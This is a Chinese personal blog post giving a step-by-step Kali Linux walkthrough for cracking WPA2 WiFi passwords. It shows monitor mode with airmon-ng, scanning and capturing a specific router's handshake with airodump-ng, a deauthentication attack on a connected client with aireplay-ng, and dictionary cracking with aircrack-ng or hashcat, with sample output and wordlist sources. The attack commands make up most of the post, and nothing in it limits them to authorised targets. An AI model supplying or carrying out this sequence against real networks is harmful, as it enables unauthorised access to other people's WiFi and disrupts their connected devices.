侧边栏壁纸
博主头像
Eoser's page!博主等级

@学习@生活@自己

  • 累计撰写 113 篇文章
  • 累计创建 29 个标签
  • 累计收到 0 条评论

目 录CONTENT

文章目录

Kail技能点+1:WiFi密码破解

eoser
2023-10-31 / 0 评论 / 0 点赞 / 4 阅读 / 4536 字

Kail技能点+1:WiFi密码破解

准备工具

USB无线网卡 airmon-ng软件

破解流程
  1. 查看网卡信息,找到无线网卡名字,我的是wlan0

ifconfig
  1. 用airmon-ng打开网卡监听

airmon-ng start wlan0
#关闭就 airmon-ng stop wlan0mon
  1. 查看监听后的网卡名,变成了wlan0mon

iwconfig #没输错,就是w
  1. 通过air命令扫描周边WIFI环境

airodump-ng wlan0mon

# 下面是精简的输出信息,bssid---路由器MAC,PWR---信号强度,带上-数符号,越大越好
# CH---信道,ESSID---路由器WIFI名字,STATION---连接设备的MAC
CH  7 ][ Elapsed: 0 s ][ 2023-10-31 04:02                                                                          
                                                                                                                    
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                    
                                                                                                                    
 F4:2A:7D:D0:63:CC  -83        2        0    0   7  130   WPA2 CCMP   PSK  ZHR                                      
 FE:6D:2F:F3:78:44  -73        3        0    0   6  360   WPA2 CCMP   PSK  <length:  0>                             
 ......  
# 这下面是连接设备的信息                                                                                                                                          
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                  
                                                                                                                    
 (not associated)   E0:B9:4D:DF:94:19  -85    0 - 1      0        2         24-4                                    
 F4:2A:7D:D0:63:CC  BC:1C:81:87:15:53  -83    0 - 1      0        2
 ...... 
  1. 监听路由器与设备间的通信,抓包获取密码哈希值,还可以扫描到与该路由器通信的设备MAC

airodump-ng --bssid F4:2A:7D:D0:63:CC -c 7 -w ZHR wlan0mon
#airodump-ng --bssid 路由器MAC -c 信道 -w 抓包文件名 wlan0mon

# 抓到HASH后会显示 WPA handshake: 路由器MAC
3:36:56  Created capture file "Test0-01.cap".

 CH  1 ][ Elapsed: 18 s ][ 2023-10-31 03:37 ][ WPA handshake: XXXXX                                     
                                                                                                                    
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                
  1. 攻击设备,让设备重连(可选),第5步往往抓取不到HASH,或者要监听很久,就可以通过该步骤攻击一段时间后再用第五步的扫描监听

aireplay-ng -0 8 -a F4:2A:7D:D0:63:CC -c BC:1C:81:87:15:53 wlan0mon
# airodump-ng -0 攻击次数,这里是8次,0为无限次 -a 路由器MAC -c 与路由器连接设备的MAC wlan0mon
  1. 使用密码库撞库密码

aircrack-ng -w passwd.txt Test0-01.cap
# aircrack-ng -w 密码字典 抓到了HASH值的抓包文件
密码字典获取方式

网上的常用密码项目

[SecLists](https://github.com/danielmiessler/SecLists)

[Probable-Wordlists](https://github.com/berzerk0/Probable-Wordlists)

本地自带的密码字典

/usr/share/wordlists/rockyou.txt.gz

密码字典撞库性能提升

使用hashcat来代替aircrack-ng撞库

不想网站转换的,可以考虑编译类型转换工具源码 https://github.com/ZerBea/hcxtools ,目前我还没有编译通过过

  • hashcat -m 22000 hashcat能处理的文件 密码字典

-m 22000 是指定了hashcat解密模式为WPA/WPA2

0

评论区